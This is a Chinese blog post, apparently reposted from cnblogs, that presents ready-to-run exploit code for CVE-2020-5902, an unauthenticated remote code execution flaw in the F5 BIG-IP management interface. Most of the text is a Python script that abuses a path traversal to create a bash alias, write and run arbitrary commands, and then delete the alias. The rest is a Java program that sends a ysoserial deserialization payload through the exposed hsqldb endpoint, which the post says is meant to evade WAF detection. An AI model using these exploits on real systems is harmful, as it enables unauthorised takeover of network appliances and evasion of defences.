zoukankan      html  css  js  c++  java
  • cve-2020-5902 RCE的payload以及绕过方式

    通过bash执行命令的 payload

    通过alias = bash去绕过无法执行shell的限制。payload如下

    #coding:utf-8
    import requests
    import json
    import requests.packages.urllib3
    requests.packages.urllib3.disable_warnings()
    import uuid
    import sys
    
    # tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
    # fileSave.jsp?fileName=/tmp/cmd&content=id
    # tmshCmd.jsp?command=list+/tmp/cmd
    # tmshCmd.jsp?command=delete+cli+alias+private+list
    
    banner = r'''
     _______  _______    ______  _________ _______   _________ _______    _______  _______  _______ 
    (  ____ (  ____   (  ___  \__   __/(  ____   \__   __/(  ____ )  (  ____ )(  ____ (  ____ 
    | (    /| (    /  | (   ) )   ) (   | (    /     ) (   | (    )|  | (    )|| (    /| (    /
    | (__    | (____    | (__/ /    | |   | |           | |   | (____)|  | (____)|| |      | (__    
    |  __)   (_____    |  __ (     | |   | | ____      | |   |  _____)  |     __)| |      |  __)   
    | (            ) )  | (       | |   | | \_  )     | |   | (        | ( (   | |      | (      
    | )      /\____) )  | )___) )___) (___| (___) |  ___) (___| )        | )  \__| (____/| (____/
    |/       \______/   |/ \___/ \_______/(_______)  \_______/|/         |/   \__/(_______/(_______/
                                                                                                    
                            CVE-2020-5902 UnAuth RCE Vuln
                                Python By Jas502n
    From: https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
    ____________________________________________________________________________________________________________________________________________________
    '''
    
    def tmshCmd_exit(url,file,cmd):
        tmshCmd_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
        proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
        r = requests.get(tmshCmd_url,verify=False,allow_redirects=False)
        # r = requests.get(tmshCmd_url,verify=False,allow_redirects=False,proxies=proxies)
    
        response_str = json.dumps(r.headers.__dict__['_store'])
        # print type(response_str)
        # print response_str
        if r.status_code == 200 and 'tmui' in response_str:
            # print tmshCmd_url
            print "[+] tmshCmd.jsp Exit!"
            print "[+] create cli alias private list command bash 
    "
            # cmd = 'whoami'
            upload_exit(url,file,cmd)
    
    
        else:
            print "[+] tmshCmd.jsp No Exit!
    "
    
    def upload_exit(url,file,cmd):
        fileSave_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content="%file + cmd
        proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
        r = requests.get(fileSave_url,verify=False,allow_redirects=False)
        # r = requests.get(fileSave_url,verify=False,allow_redirects=False,proxies=proxies)
        response_str = json.dumps(r.headers.__dict__['_store'])
        if r.status_code == 200 and 'tmui' in response_str:
            # print fileSave_url
            print "[+] fileSave.jsp Exit!
    "
            list_command(url,file)
        else:
            print "[+] fileSave.jsp No Exit!
    "
    
    def list_command(url,file):
        rce_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/%s" % file
        proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
        r = requests.get(rce_url,verify=False,allow_redirects=False)
        # r = requests.get(rce_url,verify=False,allow_redirects=False,proxies=proxies)
        response_str = json.dumps(r.headers.__dict__['_store'])
        # print len(r.content)
        if r.status_code == 200 and 'tmui' in response_str:
            if len(r.content) > 33:
                # print rce_url
                print "[+] Command Successfull !
    "
                command_result = json.loads(r.content)
                print "_"*90,'
    
    '
                print command_result['output']
                print "_"*90,"
    
    "
                delete_list(url)
        else:
            print "[+] Command Failed !
    "
    
    def delete_list(url):
        delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
        proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
        r = requests.get(delete_url,verify=False,allow_redirects=False)
        # r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)
        response_str = json.dumps(r.headers.__dict__['_store'])
        if r.status_code == 200 and 'tmui' in response_str:
            # print delete_url
            print "[+] delete cli alias private list Successfull! 
    "
        else:
            print "[+] delete cli alias private list Failed! 
    "
    
    
    if __name__ == '__main__':
        print banner
        while 1:
            url = "https://x.x.x.x/"
            # url = sys.argv[1]
            file = str(uuid.uuid1())
            print "/tmp/" + file,"
    "
            cmd = raw_input("[+]Set Cmd= ")
            print
            tmshCmd_exit(url,file,cmd)
    

    通过java反序列化绕过waf的payload

    上一种payload特征明显,很容易被waf等设备拦截。在这里我们可以使用java反序列化配合cve 2020-5902去执行命令。做到隐藏特征以绕过waf。

    代码如下

    /*
     Exploit Title: F5 BIG-IP Remote Code Execution
     Date: 2020-07-06
     Authors: Charles Dardaman of Critical Start, TeamARES
                      Rich Mirch of Critical Start, TeamARES
     CVE: CVE-2020-5902
     Requirements:
       Java JDK
       hsqldb.jar 1.8
       ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
    */
    
    import java.sql.Connection;
    import java.sql.DriverManager;
    import java.sql.Statement;
    import java.nio.file.Files;
    import java.nio.file.Paths;
    import java.io.IOException;
    import org.hsqldb.lib.StringConverter;
    
    public class f5RCE {
    
    	public static void main(String[] args) {
    		Connection connection;
    		Statement statement;
    
    		if(args.length != 2) {
    			System.err.println("
    Usage: <hostname> <payload.txt>
    ");
    			System.exit(1);
    		}
    		String server = args[0];
    		String pfile = args[1];
    		String payload = null;
    
    		try {
    			payload = new String(Files.readAllBytes(Paths.get(pfile)));
    			payload = payload.replaceAll("(\n|\r)","");
    		} catch (IOException e) {
    			e.printStackTrace();
    		}
    
    		String dburl = "jdbc:hsqldb:https://" + server +
                                   ":443/tmui/login.jsp/..%3b/hsqldb/";
    
    		System.out.println("Connecting to " + server);
    		try {
    			Class.forName("org.hsqldb.jdbcDriver");
    			connection = DriverManager.getConnection(dburl, "sa","");
    			statement = connection.createStatement();
    			statement.execute("call "java.lang.System.setProperty"('org.apache.commons.collections.enableUnsafeSerialization','true')");
    			statement.execute("call "org.hsqldb.util.ScriptTool.main"('" + payload +"');");
    		} catch (java.sql.SQLException sqle) {
    			// ignore java.sql.SQLException: S1000
    			// General error java.lang.IllegalArgumentException: argument type mismatch
    			if(sqle.getSQLState().equals("S1000") && sqle.getErrorCode() == 40) {
    				System.out.println("Payload executed");
    			} else {
    				System.out.println("Unexpected SQL error");
    				sqle.printStackTrace();
    			}
    			return;
    		}
    		catch (ClassNotFoundException cne) {
    			System.err.println("Error loading db driver");
    			cne.printStackTrace();
    			return;
    		}
    	}
    }
    

    参考

    1. https://github.com/jas502n/CVE-2020-5902/blob/master/CVE-2020-5902.py
    2. https://github.com/Critical-Start/Team-Ares/blob/master/CVE-2020-5902/f5RCE.java

  • 相关阅读:
    lhgdialogv3.13 使用点滴
    CheckBoxList 取值 及选中相关用法
    repeater 及 gridview 中绑定短日期
    数据库中日期大小的判断
    父子不同窗口间刷新传值
    子级Repeater获取父级Repeater绑定项的值
    vs.net 2010 web 项目中使用 webservice
    web打印实现方案 Lodop6.034 使用方法总结
    用 showModalDialog 方法回传数据到父页中去
    vs.net2010中使用 Ajax Control Toolkit
  • 原文地址:https://www.cnblogs.com/potatsoSec/p/13263806.html
Copyright © 2011-2022 走看看